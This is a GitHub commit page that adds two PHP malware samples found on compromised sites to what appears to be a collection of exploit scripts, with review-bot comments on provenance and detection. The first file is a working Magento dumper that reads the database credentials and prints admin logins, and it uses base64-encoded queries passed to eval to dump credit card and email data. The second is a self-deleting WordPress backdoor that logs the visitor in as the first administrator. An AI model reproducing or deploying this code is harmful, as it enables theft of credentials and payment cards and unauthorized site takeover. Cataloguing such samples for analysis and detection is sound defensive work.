
Commit bc23a36

committed
Merge branch 'master' of github.com:mattiasgeniar/php-exploit-scripts
* 'master' of github.com:mattiasgeniar/php-exploit-scripts: Found on magento Create backdoor_admin_access.php
2 parents 1ffe101 + 6dce175 commit bc23a36

2 files changed

+142
-0
lines changed

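--- a/found_on_magento/dump.php
+++ b/found_on_magento/dump.php
@@ -0,0 +1,122 @@
+<?php
+
+#===================================================================#
+# MAGENTO CMS AUTO DUMPER BY SYNCHRONIZER
+# RECODED BY rain | Res7ock crew #
+# WWW.PRINGSEWUDEV.ORG | WWW.PRINGSEWUCYBER.ORG #
+# http://facebook.com/annamLRW #
+#===================================================================#
+?>
+<style type="text/css">
+body {
+background:black;
+color: lime;
+}
+table {
+border-collapse: collapse;
+background-color: black
+}
+
+th, td {
+text-align: center;
+padding: 6px;
+}
+table, th, td {
+border: 1px solid green;
+}
+tr:nth-child(even){background-color: black }
+
+th {
+border: 1px solid green;
+background-color: #333;
+color: gold;
+}
+</style>
+<?php
+echo '<font color=lime>'.php_uname().'</font>';
+$adm = '
+mysql_select_db($connection->dbname);
+echo "HOST : <font color=gold>".$connection->host ."</font><font color=gold> | </font>USERNAME : <font color=gold>".$connection->username."</font><font color=gold> | </font>PASSWORD : <font color=gold>".$connection->password."</font><font color=gold> | </font>DB_NAME : <font color=gold>".$connection->dbname."</font></p>";
+$result = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM `".$prefix."admin_user` where is_active = 1");
+if($result !== FALSE) {
+while($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
+echo "<tr><td >".$row["user_id"]."</td>
+<td >".$row["username"]."</td>
+<td >".$row["password"]."</td>
+<td >".$row["email"]."</td>
+<td >".$row["firstname"]."</td>
+<td >".$row["lastname"]."</td></tr>";
+
+}
+mysql_free_result($result);
+}
+';
+
+$ccpay = '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';
+$maildump = "ICRyZXN1bHQgPSBteXNxbF9xdWVyeSgiU0VMRUNUIGVtYWlsIEZST00gICIuJHByZWZpeC4iY3VzdG9tZXJfZW50aXR5Iik7DQogICAgICAgaWYoJHJlc3VsdCAhPT0gRkFMU0UpIHsNCiAgICAgICAgICAgd2hpbGUoJHJvdyA9IG15c3FsX2ZldGNoX2FycmF5KCRyZXN1bHQsIE1ZU1FMX0FTU09DKSkgew0KICAgICAgICAgICAgICAgZWNobyAiDQoJCQkgICA8dHI+DQoJCQkgICA8dGQgPiIuJHJvd1siZW1haWwiXS4iPC90ZD48L3RyPg0KCQkJICAgIjsNCiAgICAgICAgICAgfQ0KICAgICAgICAgICBteXNxbF9mcmVlX3Jlc3VsdCgkcmVzdWx0KTsNCiAgICAgICB9";
+?>
+<?php
+
+error_reporting(E_ALL);
+ini_set('display_errors', TRUE);
+ini_set('display_startup_errors', TRUE);
+
+function print_data($data){
+if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')) {
+$xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml');
+if(isset($xml->global->resources->default_setup->connection)) {
+$connection = $xml->global->resources->default_setup->connection;
+$prefix = $xml->global->resources->db->table_prefix;
+
+require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php';
+
+try {
+$app = Mage::app('default');
+Mage::getSingleton('core/session', array('name'=>'frontend'));
+}catch(Exception $e) {
+}
+
+if (!mysql_connect($connection->host, $connection->username, $connection->password)){
+print("Could not connect: " . mysql_error());
+}
+eval($data);
+}
+}
+}
+?>
+
+<center>
+<table style="text-align:center" width=90% class="tg">
+<tr>
+<th >ID</th>
+<th >USER_NAME</th>
+<th >PASSWORD</th>
+<th >EMAIL</th>
+<th >FIRST_NAME</th>
+<th >LAST_NAME</th>
+</tr>
+<?php
+echo print_data($adm);
+?>
+</table></p>
+<table style="text-align:center" width=90% class="tg">
+<tr>
+<th >CC_OWNER</th>
+<th >CC_NUMBER</th>
+<th >EXPIRED DATE</th>
+<th >BILLING ADDRESS</th>
+<th >cvv</th>
+</tr>
+<?php
+echo print_data(base64_decode($ccpay));
+?>
+</table>
+</p>
+<table style="text-align:center" width=90% class="tg">
+<tr>
+<th >E-MAIL ADDRESS</th>
+</tr>
+<?php
+echo print_data(base64_decode($maildump));
+?>
+</table>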
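Review bot: This sample is committed as a directly executable `.php` file with no provenance or handling header, so a checkout placed under a web root would serve a working credential dumper. I would add a top-of-file comment recording where and when it was recovered and that it is for analysis only, e.g. `# SAMPLE: recovered from a compromised Magento store; analysis only, do not deploy`, and store it under a non-executable name. For anyone writing detections from it: the query text behind the second and third tables is base64-encoded in `$ccpay` and `$maildump` and only reaches `eval($data)` inside `print_data` (line 82), so table-name signatures will not match those parts. The stable indicators visible here are the read of `app/etc/local.xml` combined with `eval(` applied to `base64_decode(...)` output.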
Lines changed: 20 additions & 0 deletions
@@ -0,0 +1,20 @@
1+
@unlink(__FILE__);
2+
3+
require('../../../wp-blog-header.php');
4+
require('../../../wp-includes/pluggable.php');
5+
$user_info = get_userdata(1);
6+
// Automatic login //
7+
$username = $user_info->user_login;
8+
$user = get_user_by('login', $username );
9+
// Redirect URL //
10+
if ( !is_wp_error( $user ) )
11+
{
12+
wp_clear_auth_cookie();
13+
wp_set_current_user ( $user->ID );
14+
wp_set_auth_cookie ( $user->ID );
15+
16+
$redirect_to = user_admin_url();
17+
wp_safe_redirect( $redirect_to );
18+
19+
exit();
20+
}
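Review bot: The second file is added without any header saying what it is or where it was found, and as rendered it begins at `@unlink(__FILE__);` with no opening `<?php` tag, so it is unclear whether the sample was captured complete. A short provenance comment at the top would help, e.g. `// SAMPLE: WordPress admin-login backdoor recovered from a compromised site; analysis only`. Responders should note from line 1 that the script deletes itself when it runs, so its absence on disk proves nothing. The evidence is more likely to sit in web access logs (a request to a path three levels below the WordPress root, followed by the redirect to the admin area) and in an auth cookie issued for user ID 1 through `wp_set_auth_cookie` without a preceding login request.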
